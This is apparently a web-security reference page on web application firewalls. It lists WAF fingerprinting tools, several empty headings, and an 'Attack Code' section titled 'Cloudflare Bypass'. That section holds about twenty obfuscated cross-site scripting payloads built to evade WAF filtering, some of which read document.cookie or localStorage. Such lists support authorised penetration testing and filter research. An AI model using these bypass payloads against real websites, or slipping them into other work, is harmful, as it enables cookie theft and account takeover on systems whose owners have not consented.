Web Application Firewall
​Awesome-WAF - The Definitive Guide.

Fingerprinting

  • ​WhatWaf - Detect and bypass web application firewalls and protection systems
  • ​WAFW00F - The ultimate WAF fingerprinting tool with the largest fingerprint database from @EnableSecurity.
  • ​IdentYwaf - A blind WAF detection tool which utlises a unique method of identifying WAFs based upon previously collected fingerprints by @stamparm.

Testing

Evasion

Blogs and Writeups

Many of the content mentioned above have been taken from some of the following excellent writeups.

Video Presentations

Presentations & Research Papers

Research Papers:

Presentations:

Attack Code

Cloudflare Bypass

1
<svg%0Aonauxclick=0;[1].some(confirm)//
2
​
3
<svg onload=alert%26%230000000040"")>
4
​
5
<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>
6
<svg onx=() onload=(confirm)(1)>
7
​
8
<svg onx=() onload=(confirm)(document.cookie)>
9
​
10
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
11
​
12
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
13
​
14
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
15
​
16
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
17
​
18
"><onx=[] onmouseover=prompt(1)>
19
​
20
%2sscript%2ualert()%2s/script%2u -xss popup
21
​
22
<svg onload=alert%26%230000000040"1")>
23
​
24
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
25
​
26
[1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt&lpar;1&rpar;prompt&#40;1&#41;prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
27
​
28
<svg onload=prompt%26%230000000040document.domain)>
29
​
30
<svg onload=prompt%26%23x000000028;document.domain)>
31
​
32
<svg/onrandom=random onload=confirm(1)>
33
​
34
<video onnull=null onmouseover=confirm(1)>
35
​
36
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
37
​
38
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
39
​
40
<img ignored=() src=x onerror=prompt(1)>
Copied!